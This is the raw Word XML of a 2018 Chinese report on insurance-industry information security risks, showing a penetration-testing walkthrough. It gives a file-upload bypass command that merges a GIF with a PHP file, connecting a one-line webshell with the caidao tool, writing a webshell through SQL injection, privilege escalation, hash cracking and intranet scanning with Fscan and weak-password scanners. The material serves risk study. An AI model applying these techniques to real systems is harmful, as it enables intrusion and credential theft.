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6" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8516"/>
      </w:tblGrid>
      <w:tr w:rsidR="003F6D9B" w:rsidRPr="00B518D5" w:rsidTr="002B76B4">
        <w:trPr>
          <w:trHeight w:val="1702"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8516" w:type="dxa"/>
          </w:tcPr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caps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15875</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2351405" cy="469265"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:wrapNone/>
                  <wp:docPr id="38" name="图片 2" descr="基金会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基金会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18D5">
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
                <w:b/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:br w:type="page"/>
            </w:r>
            <w:r w:rsidRPr="00B518D5">
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
                <w:b/>
                <w:sz w:val="36"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:br w:type="page"/>
            </w:r>
            <w:r w:rsidRPr="00B518D5">
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
                <w:caps/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F6D9B" w:rsidRPr="00B518D5" w:rsidTr="002B76B4">
        <w:trPr>
          <w:trHeight w:val="2880"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8516" w:type="dxa"/>
          </w:tcPr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caps/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F6D9B" w:rsidRPr="00C956E7" w:rsidTr="002B76B4">
        <w:trPr>
          <w:trHeight w:val="1440"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8516" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="003F6D9B" w:rsidRPr="00C956E7" w:rsidRDefault="003F6D9B" w:rsidP="002B76B4">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="80"/>
                <w:szCs w:val="80"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003F6D9B">
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>保险行业信息安全风险研究</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F6D9B" w:rsidRPr="00B518D5" w:rsidTr="002B76B4">
        <w:trPr>
          <w:trHeight w:val="720"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8516" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr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44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B518D5">
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F6D9B" w:rsidRPr="00B518D5" w:rsidTr="002B76B4">
        <w:trPr>
          <w:trHeight w:val="360"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8516" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr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40"/>
              </w:rPr>
            </w:pPr>
          </w:p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40"/>
              </w:rPr>
            </w:pPr>
          </w:p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40"/>
              </w:rPr>
            </w:pPr>
          </w:p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40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="003F6D9B" w:rsidRPr="00B518D5" w:rsidRDefault="003F6D9B" w:rsidP="002B76B4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  <w:p w:rsidR="003F6D9B" w:rsidRPr="00B518D5" w:rsidRDefault="003F6D9B" w:rsidP="002B76B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  <w:p w:rsidR="003F6D9B" w:rsidRPr="00B518D5" w:rsidRDefault="003F6D9B" w:rsidP="002B76B4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  <w:p w:rsidR="003F6D9B" w:rsidRPr="00B518D5" w:rsidRDefault="003F6D9B" w:rsidP="002B76B4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3F6D9B" w:rsidRPr="00097BAD" w:rsidTr="002B76B4">
        <w:trPr>
          <w:trHeight w:val="360"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8516" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="003F6D9B" w:rsidRPr="00097BAD" w:rsidRDefault="003F6D9B" w:rsidP="002B76B4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2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00097BAD">
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
                <w:caps/>
                <w:kern w:val="0"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>北京保研公益基金会</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F6D9B" w:rsidRPr="0021195D" w:rsidTr="002B76B4">
        <w:trPr>
          <w:trHeight w:val="360"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8516" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="003F6D9B" w:rsidRPr="0021195D" w:rsidRDefault="003F6D9B" w:rsidP="002B76B4">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
                <w:caps/>
                <w:kern w:val="0"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="003F6D9B" w:rsidRPr="0021195D" w:rsidRDefault="003F6D9B" w:rsidP="003F6D9B">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
                <w:caps/>
                <w:kern w:val="0"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
                <w:caps/>
                <w:kern w:val="0"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>二〇一八年十二</w:t>
            </w:r>
            <w:r w:rsidRPr="0021195D">
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
                <w:caps/>
                <w:kern w:val="0"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>月</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00490DB2" w:rsidRDefault="00490DB2" w:rsidP="00AD30F5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</w:p>
    <w:p w:rsidR="00C31626" w:rsidRDefault="00C31626" w:rsidP="00AD30F5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</w:p>
    <w:p w:rsidR="00480C0C" w:rsidRDefault="00480C0C" w:rsidP="00480C0C">
      <w:pPr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noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2978398"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="17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sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4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. 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分析上传代码漏洞</w:t>
      </w:r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程序上传代码存在的问题：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00480C0C" w:rsidRPr="00B60402" w:rsidRDefault="00480C0C" w:rsidP="00B60402">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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未检查上传的文件类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60402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将上传文件拷贝到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upload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目录前会：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60402" w:rsidRPr="00B60402" w:rsidRDefault="00480C0C" w:rsidP="00B60402">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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检查图片的长宽进行缩放操作；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00480C0C" w:rsidRPr="00B60402" w:rsidRDefault="00480C0C" w:rsidP="00B60402">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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重命名上传的文件</w:t>
      </w:r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应对：</w:t>
      </w:r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上传的文件需要有正常的图片信息，以便代码进行图片缩放操作</w:t>
      </w:r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确定上传的文件名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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方法：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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copy  1.gif</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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+1.php 2.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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5. 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上传特定文件获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00480C0C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>caidao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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连接上传的一句话</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00480C0C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00480C0C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480C0C" w:rsidRDefault="00480C0C" w:rsidP="00480C0C">
      <w:pPr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noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2831889"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="18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80C0C" w:rsidRDefault="00480C0C" w:rsidP="00480C0C">
      <w:pPr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noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3389233"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="19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sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6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. 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通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00480C0C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQL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注入直接</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00480C0C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsid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已知站点的物理路径，系统又存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00480C0C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQL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注入漏洞，我们是否可以直接通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00480C0C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQL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注入写入一句话</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00480C0C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00480C0C" w:rsidRDefault="00480C0C" w:rsidP="00480C0C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00480C0C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1682407"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="20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80C0C" w:rsidRPr="00480C0C" w:rsidRDefault="00480C0C" w:rsidP="00480C0C">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="56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失败的原因是什么</w:t>
      </w:r>
      <w:r w:rsidR="00FB7304">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>？权限决定了</w:t>
      </w:r>
      <w:r w:rsidRPr="00480C0C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>能力！</w:t>
      </w:r>
      <w:r w:rsidRPr="00480C0C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F1315F" w:rsidRDefault="00F1315F" w:rsidP="00A96FAD">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.5.</w:t>
      </w:r>
      <w:r w:rsidR="00662809">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提升权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E6887" w:rsidRDefault="007703CB" w:rsidP="00097BBD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1. </w:t>
      </w:r>
      <w:r w:rsidRPr="007703CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>权限决定了你的能力</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E78D8" w:rsidRPr="007E78D8" w:rsidRDefault="007E78D8" w:rsidP="007E78D8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A. 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通过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SQL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注入点所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拥有的权限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包括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：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E78D8" w:rsidRPr="00B60402" w:rsidRDefault="007E78D8" w:rsidP="00B60402">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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运行数据库服务的进程（用户）权限决定了系统权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E78D8" w:rsidRPr="00B60402" w:rsidRDefault="007E78D8" w:rsidP="00B60402">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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当前数据库用户的权限决定了数据库操作权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E78D8" w:rsidRPr="007E78D8" w:rsidRDefault="007E78D8" w:rsidP="007E78D8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B. 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上传的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>所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拥有的权限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包括</w:t>
      </w:r>
      <w:r w:rsidRPr="007E78D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E78D8" w:rsidRPr="00B60402" w:rsidRDefault="007E78D8" w:rsidP="00B60402">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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运行当前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 xml:space="preserve">web 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服务的进程（用户）权限决定了系统权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E78D8" w:rsidRPr="00B60402" w:rsidRDefault="007E78D8" w:rsidP="00B60402">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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在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webshell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命令行中执行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whoami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查看运行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web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服务的用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E78D8" w:rsidRPr="00B60402" w:rsidRDefault="007E78D8" w:rsidP="00B60402">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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 xml:space="preserve">C. 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至此，我们拥有了如下权限：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E78D8" w:rsidRPr="00B60402" w:rsidRDefault="007E78D8" w:rsidP="00B60402">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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当前数据库用户为非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用户，仅为普通用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0057566D" w:rsidRPr="00B60402" w:rsidRDefault="007E78D8" w:rsidP="00B60402">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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当前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web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用户为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UDN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，仅为普通用户，对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web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目录拥有完全的权限，其他目录权限受限；仅能执行非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命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007703CB" w:rsidRDefault="001464A6" w:rsidP="00097BBD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2. </w:t>
      </w:r>
      <w:r w:rsidRPr="001464A6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>如何提升权限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A. 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通过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web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服务进程：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通过本地</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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提权漏洞</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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提升当前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web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用户权限为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权限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B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.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 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通过其他系统服务：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lastRenderedPageBreak/>
        <w:t>其他系统服务由于配置错误（如配置为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运行）及该服务的本地</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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提权漏洞</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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提升为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权限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C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.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 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通过合法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用户：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E78D8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通过其他方法（如内网渗透收集的密码等）获取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用户的密码，通过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登录（或</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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方法）等提升为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权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001464A6" w:rsidRDefault="001464A6" w:rsidP="00097BBD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3. </w:t>
      </w:r>
      <w:r w:rsidRPr="001464A6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>提升权限</w:t>
      </w:r>
      <w:r w:rsidR="00D41DC7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="001464A6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B59B5" w:rsidRPr="007B59B5" w:rsidRDefault="007B59B5" w:rsidP="007B59B5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提升权限的一般流程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如下</w:t>
      </w:r>
      <w:r w:rsidRPr="007B59B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r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确定当前系统的详细版本信息</w:t>
      </w:r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收集当前系统的运行服务的详细信息</w:t>
      </w:r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通过漏洞披露站点收集该版本及相关服务的</w:t>
      </w:r>
      <w:proofErr w:type="gram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提权漏洞</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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在测试环境调试漏洞利用代码，然后上传至目标站点，执行利用</w:t>
      </w:r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获取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权限后获取系统用户密码的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hash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文件，并进行破解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B59B5" w:rsidRPr="00B60402" w:rsidRDefault="007B59B5" w:rsidP="00B60402">
      <w:pPr>
        <w:pStyle w:val="a7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同步进行内网的渗透工作，随着成果的扩大，收集的密码的增多，得到合法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root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密码的可能性非常大（原因：用户的惰性）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1315F" w:rsidRDefault="00F1315F" w:rsidP="00A96FAD">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.5.</w:t>
      </w:r>
      <w:r w:rsidR="00662809">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内网渗透</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96E03" w:rsidRDefault="00233530" w:rsidP="00233530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1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00233530">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>内网渗透可以做的工作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60402" w:rsidRPr="00B60402" w:rsidRDefault="00B60402" w:rsidP="00B60402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A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.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 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探测相关联的目标：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60402" w:rsidRPr="00B60402" w:rsidRDefault="00B60402" w:rsidP="00B60402">
      <w:pPr>
        <w:pStyle w:val="a7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通过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netstat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查看相关主机，成为首选的下一步攻击目标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60402" w:rsidRPr="00B60402" w:rsidRDefault="00B60402" w:rsidP="00B60402">
      <w:pPr>
        <w:pStyle w:val="a7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使用端口扫描工具（如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Fscan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）对内网进行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C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段扫描，探测存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lastRenderedPageBreak/>
        <w:t>活主机及其开放的敏感服务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60402" w:rsidRPr="00B60402" w:rsidRDefault="00B60402" w:rsidP="00B60402">
      <w:pPr>
        <w:pStyle w:val="a7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通过历史记录（如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cmd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，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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mstsc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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）的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IP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等获取相关目标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60402" w:rsidRPr="00B60402" w:rsidRDefault="00B60402" w:rsidP="00B60402">
      <w:pPr>
        <w:pStyle w:val="a7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随着渗透的深入，整理上述信息简单描绘目标的网络结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60402" w:rsidRPr="00B60402" w:rsidRDefault="00B60402" w:rsidP="00B60402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B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.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 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密码获取：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60402" w:rsidRPr="00B60402" w:rsidRDefault="00B60402" w:rsidP="00B6040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弱口令扫描工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60402" w:rsidRPr="00B60402" w:rsidRDefault="00B60402" w:rsidP="00B6040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破解密码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hash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，加入字典，扩大扫描成果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60402" w:rsidRPr="00B60402" w:rsidRDefault="00B60402" w:rsidP="00B6040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局域网嗅探，截获密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60402" w:rsidRPr="00B60402" w:rsidRDefault="00B60402" w:rsidP="00B60402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C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.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 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敏感信息收集、维持访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00233530" w:rsidRDefault="00233530" w:rsidP="00233530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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00233530">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>可能的工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60402" w:rsidRPr="00B60402" w:rsidRDefault="00B60402" w:rsidP="00B60402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内网渗透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常用的几个工具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包括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：</w:t>
      </w:r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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Fscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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scan3,x-scan,WebScanner</w:t>
      </w:r>
      <w:r w:rsidRPr="00B60402">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>等弱口令扫描工具</w:t>
